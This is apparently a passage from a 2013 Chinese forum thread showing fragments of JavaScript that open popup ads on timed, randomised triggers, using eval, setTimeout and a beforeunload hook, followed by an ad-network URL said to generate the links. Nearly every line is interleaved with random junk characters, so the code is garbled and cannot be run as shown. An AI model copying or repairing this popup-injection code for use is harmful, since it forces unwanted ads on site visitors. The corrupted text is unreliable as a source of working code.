. E- g' W: ]1 H2 J, Y6 q5 w - pop(url, { + a$ S8 y" o$ ~. y# T% ]
- a: 1,
% c9 X4 M4 x1 q9 M3 @ m8 E - b: 2
0 s5 a' S! X( } - }) . w3 X! K2 f( x4 l& [3 ^
- },
5 e7 q% ?# R* I3 R9 w0 t7 T - 300)
+ ~# x6 H- U+ ], g3 H0 A5 h/ q - } - ]+ |$ m1 W G2 `' d) A) L
- for (var i = 1; i <= 10; i++) { 8 }% [8 t7 A/ f! y+ W6 g
- var n = i == 1 ? "": i;
( V f0 q! ~9 |. C" G- U0 V- a - if (eval("_pt" + n + "b") > Math.random()) {
+ t/ W% U6 q7 P - setTimeout(function() { ( L5 {& w& j# Z) K2 W' @0 A
- setTimeout(function() { 8 o! _5 l) I+ q: s- e8 W
- pop(url, {
* x2 b5 b/ b" e* K6 _( ?2 m - a: 1, {3 f% n. o: S) `! b f8 r
- b: 2
; R: R/ Q, L$ B - }) $ r' D' @& G1 ^9 A/ [
- },
% {7 `8 S ~1 d" @' p - 300) - Y9 b g% C/ [' f/ o$ l: o
- },
1 d9 C8 l) `! B+ T8 @+ N - parseInt(eval("_pt" + n + "a")) * 1000)
* m0 D- P; b4 I - }
* w1 g9 @' S3 U/ z4 J4 N( C& v - } 2 B* _& Z% N( A4 ~( v
- if (_pc2 > Math.random()) { , T X3 c# V2 z# I1 p
- a_pop(url) 6 ?: p6 ]* y. Z, j
- }
9 z p1 K( w# ?; u: ] - if (_po > Math.random()) { 3 E; c( ?/ ~& R) S2 v9 t
- try { ( }2 ^+ ^2 O6 @; z% |6 ^
- func(url) 3 g. w% z: J* n
- } catch(q) {} 7 D- R- L$ ?' \/ C @: s0 m: T* |& W2 K
- } 6 w) e( ^9 n+ {5 g- }
- }
* v# t O& {4 H - }; 1 M, I$ e% W) X8 i/ I# ^0 O
- fstart(aa_url); 2 m; d8 ?0 M" \( V
- event(window, 'beforeunload', 6 b' ~4 f4 p, _+ _) [
- function() {}) 4 M# |4 P& g4 d7 J) b7 C
- })();
9 @* U) m7 Y( w s4 D' B+ @% qURL从这里产生
( w0 W# M0 y. t i' }6 ~* E5 u
# @+ h1 M8 M+ k1 j' ahttp://play.unionsky.cn/show/?placeid=141830, L. T; u/ ^$ Z/ [) r
) u$ B# u/ a0 b2 }* W" u* a
. ~+ c) W- P) V6 k' W! L
|
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
